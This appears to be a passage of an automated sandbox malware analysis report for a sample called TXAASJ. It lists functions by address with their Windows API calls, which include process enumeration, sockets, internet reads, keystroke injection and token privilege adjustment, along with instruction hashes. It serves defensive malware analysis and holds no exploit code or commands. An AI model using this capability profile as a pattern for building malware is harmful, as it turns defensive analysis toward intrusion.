                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605983538-0
                                                                                                                        • Opcode ID: d3f9adbbea77bdc8ae277d61a278f5a53d4b1ec9d47b9f3bfe6910dbade0e915
                                                                                                                        • Instruction ID: 27a7195c82ea4973592dc72c45063d17c147302eb83f547ad896d767e1ee33d3
                                                                                                                        • Opcode Fuzzy Hash: d3f9adbbea77bdc8ae277d61a278f5a53d4b1ec9d47b9f3bfe6910dbade0e915
                                                                                                                        • Instruction Fuzzy Hash: 2C214F71905219ABDF10ABA4DC88BEEB7BCEB49304F1014AAE645F3141E7759B88DB60
                                                                                                                        Function 00E5A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • _memmove.LIBCMT ref: 00EC3020
                                                                                                                        • _memmove.LIBCMT ref: 00EC3135
                                                                                                                        • _memmove.LIBCMT ref: 00EC31DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1300846289-0
                                                                                                                        • Opcode ID: a48ddb4307db07a9ac5b7cacce91470daa7fab21cc96a3db02cb0a11e6fc4945
                                                                                                                        • Instruction ID: 261ee13b24d54d55505bde754ec05f44ad30a1fedfc70104ca403ccdf06919f0
                                                                                                                        • Opcode Fuzzy Hash: a48ddb4307db07a9ac5b7cacce91470daa7fab21cc96a3db02cb0a11e6fc4945
                                                                                                                        • Instruction Fuzzy Hash: AB028E70A00209DFCF04DF64D982AAEBBF5EF48340F54D469E80AEB255EB319A55CB91
                                                                                                                        Function 00EA96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00EAACF5
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00EA973D
                                                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00EA9760
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4170576061-0
                                                                                                                        • Opcode ID: e58eaf501f6c1a819dc94400926430f22eb8ec68de59d5cb2b85029dd461b8dd
                                                                                                                        • Instruction ID: 934839eab556e438d826358398c1a3d8e2453ce0ffd59c8fb0357d512c3e11d5
                                                                                                                        • Opcode Fuzzy Hash: e58eaf501f6c1a819dc94400926430f22eb8ec68de59d5cb2b85029dd461b8dd
                                                                                                                        • Instruction Fuzzy Hash: 8141D370600210AFDB10AF64DC82E6E77EDEF48364F14945EF956BB392CB74AD018B91
                                                                                                                        Function 00E9F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E9F37A
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9F3AA
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9F3BF
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00E9F3D0
                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00E9F3FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2387731787-0
                                                                                                                        • Opcode ID: 3bc109dc33eb2e4e3c8f11b0a981f7cfb38d3480ab77684372f27207e82850c0
                                                                                                                        • Instruction ID: e64ec7840e08b750eb0db0b020a4845ad3ca5533aa682dfdd321d7d82327c11d
                                                                                                                        • Opcode Fuzzy Hash: 3bc109dc33eb2e4e3c8f11b0a981f7cfb38d3480ab77684372f27207e82850c0
                                                                                                                        • Instruction Fuzzy Hash: 6841D2356047019FCB04DF28D490A9AB7E4FF49324F10452EE96AEB3A1DB31ED45CB91
                                                                                                                        Function 00EB20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EB20EC,?,00EB22E0), ref: 00EB2104
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00EB2116
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                        • Opcode ID: e8280dc543d8da57dd47bcf75f720632224ed9b62298b0f0e64aacd2facbe2bf
                                                                                                                        • Instruction ID: 8e79d0e2761ab4b6f71d5ef471fda417c1959408941f8d025a05cd4f6521f831
                                                                                                                        • Opcode Fuzzy Hash: e8280dc543d8da57dd47bcf75f720632224ed9b62298b0f0e64aacd2facbe2bf
                                                                                                                        • Instruction Fuzzy Hash: 75D05E744463128FD7205B65EC0D64237D8EF04305F10542EE799A2194D670CC80AA10
                                                                                                                        Function 00E62B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • _memmove.LIBCMT ref: 00E62C63
                                                                                                                        • _memmove.LIBCMT ref: 00E6303A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 1300846289-2766056989
                                                                                                                        • Opcode ID: c21a77f1c767915429e432d4819e77e4b4751f7b2bf7b302974830a24de0bd6c
                                                                                                                        • Instruction ID: aed138806d5ad939bf49ba5b005915be1a1200131eb87ba2ef378efdb63f7cc9
                                                                                                                        • Opcode Fuzzy Hash: c21a77f1c767915429e432d4819e77e4b4751f7b2bf7b302974830a24de0bd6c
                                                                                                                        • Instruction Fuzzy Hash: ECC29A74A00209DFCB14DFA8D990AADB7B1FF48344F24A05DE916BB351DB35AE46CB90
                                                                                                                        Function 00E56670 Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1093COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: ,d
                                                                                                                        • API String ID: 4104443479-40157079
                                                                                                                        • Opcode ID: c7a7084d638b30bb21afe376a540af7cce0674e5263fb006ffccfb3084a82abc
                                                                                                                        • Instruction ID: dd16f302eae27ad85e66251ed8efae1ac281c2a0aba40c3d58199651184f6c13
                                                                                                                        • Opcode Fuzzy Hash: c7a7084d638b30bb21afe376a540af7cce0674e5263fb006ffccfb3084a82abc
                                                                                                                        • Instruction Fuzzy Hash: EAA28A74E00219CFCB28CF58C4806ADBBB1FF58315F6595AAE859BB390D7309E86DB40
                                                                                                                        Function 00E94342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E9439C
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E943B8
                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00E94425
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00E94483
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: 0497db45d9c95388453f734fab299f283c2564fd6855143749c5b42f6fe94500
                                                                                                                        • Instruction ID: baeec3b9bfee14adaaca2c16d69d7a2a33cadb5125f986b171cad34be09dba6d
                                                                                                                        • Opcode Fuzzy Hash: 0497db45d9c95388453f734fab299f283c2564fd6855143749c5b42f6fe94500
                                                                                                                        • Instruction Fuzzy Hash: 0F4117F0A04248AEEF308B65AC08FFEBBF5AB55315F04215AF5A1B22C1C7748D869761
                                                                                                                        Function 00E9220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E9221E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($|
                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                        • Opcode ID: 27878683e04e74d4f2f37fe58d8f6b71af3a01f037d1bf32d79358fb37a13082
                                                                                                                        • Instruction ID: 46dd960f7a82869a613bfccb5249576a85de6b8f8da16936c955a157845e2ae2
                                                                                                                        • Opcode Fuzzy Hash: 27878683e04e74d4f2f37fe58d8f6b71af3a01f037d1bf32d79358fb37a13082
                                                                                                                        • Instruction Fuzzy Hash: 39322675A00705AFCB28CF69D480AAAB7F0FF48314B11D46EE59AEB7A1D770E941CB44
                                                                                                                        Function 00E6AD5C Relevance: 4.9, APIs: 3, Instructions: 378COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E6AE5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3265722593-0
                                                                                                                        • Opcode ID: 165573c90636e764f0c71e1131826f91218a996aa36730680a04305eab4b249a
                                                                                                                        • Instruction ID: cae8660c6a64c558744ab63fcc6149c9d8597547ffe3dc502bbe4cea6dbf612b
                                                                                                                        • Opcode Fuzzy Hash: 165573c90636e764f0c71e1131826f91218a996aa36730680a04305eab4b249a
                                                                                                                        • Instruction Fuzzy Hash: 78A12E70544104BADB286B296D98EFF399DEB413D9B18753EF402F61A2C927CC41EA73
                                                                                                                        Function 00EA550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EA4A1E,00000000), ref: 00EA55FD
                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EA5629
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 599397726-0
                                                                                                                        • Opcode ID: ea5e6ffc6d47be6a5977d0f4ec5d285296bbe97468cd1f914b5309ef3111415d
                                                                                                                        • Instruction ID: 1390d17afd17961094fa89c81cdfbf12970013c68c742216cd462e18fb627d86
                                                                                                                        • Opcode Fuzzy Hash: ea5e6ffc6d47be6a5977d0f4ec5d285296bbe97468cd1f914b5309ef3111415d
                                                                                                                        • Instruction Fuzzy Hash: FF41F673900609FFEB109B91DC85EBFB7FDEB86318F10505AF605BA180EA70BE409A54
                                                                                                                        Function 00E9EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9EA95
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E9EAEF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E9EB3C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1682464887-0
                                                                                                                        • Opcode ID: 451e1756ab17053a6c414f1f78c61b49ce3564cf597dce9ecbaf712f6855a6b7
                                                                                                                        • Instruction ID: 0ea69d749bce83174351acb82b1e2294696eca4962867d2220d64707f08a35cf
                                                                                                                        • Opcode Fuzzy Hash: 451e1756ab17053a6c414f1f78c61b49ce3564cf597dce9ecbaf712f6855a6b7
                                                                                                                        • Instruction Fuzzy Hash: 9A214A35A00618EFCB00DFA5D894AAEBBF8FF48314F1484AAE905BB351DB319915CB50
                                                                                                                        Function 00E8BEC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8BF0F
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E8BF3C
                                                                                                                        • GetLastError.KERNEL32 ref: 00E8BF49
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1922334811-0
                                                                                                                        • Opcode ID: 1446107b11739e318d0e27d911373b7747a9684eea2312e17364379115b45a31
                                                                                                                        • Instruction ID: 2e5e37390424a5c197f131e4294f1c2d2ed3ecfa5225591e5ed49357f098b07f
                                                                                                                        • Opcode Fuzzy Hash: 1446107b11739e318d0e27d911373b7747a9684eea2312e17364379115b45a31
                                                                                                                        • Instruction Fuzzy Hash: 5911BCB2514304AFD718AF64ECC6D6BBBFDEB44714B20852EF45AA6250DB70EC408B20
                                                                                                                        Function 00E970AE Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E970D8
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00E97115
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00E9711E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 33631002-0
                                                                                                                        • Opcode ID: b49c7029b0302f73e90dab3a3ff21170bb2bf5e410420253b745c8af1828fd1c
                                                                                                                        • Instruction ID: e254f0d474602f7de7d84703910a258f7ceaa208866ca20afce1f8dd9dc70322
                                                                                                                        • Opcode Fuzzy Hash: b49c7029b0302f73e90dab3a3ff21170bb2bf5e410420253b745c8af1828fd1c
                                                                                                                        • Instruction Fuzzy Hash: 7911A5B1915228BFE7108BADDC45FAFB7BCEB08714F004556B901F7190D2749E0887E1
                                                                                                                        Function 00E8BE31 Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00E8BE5A
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E8BE71
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00E8BE81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3429775523-0
                                                                                                                        • Opcode ID: cf7b949721319355f46aa68fb7d43e1a8cfa40186d5db4e9aa75effb89a5d371
                                                                                                                        • Instruction ID: e216f4f8bc54c154fbfa84ede8542c6558fa75b93704c358ddb1e1d9a34d77ba
                                                                                                                        • Opcode Fuzzy Hash: cf7b949721319355f46aa68fb7d43e1a8cfa40186d5db4e9aa75effb89a5d371
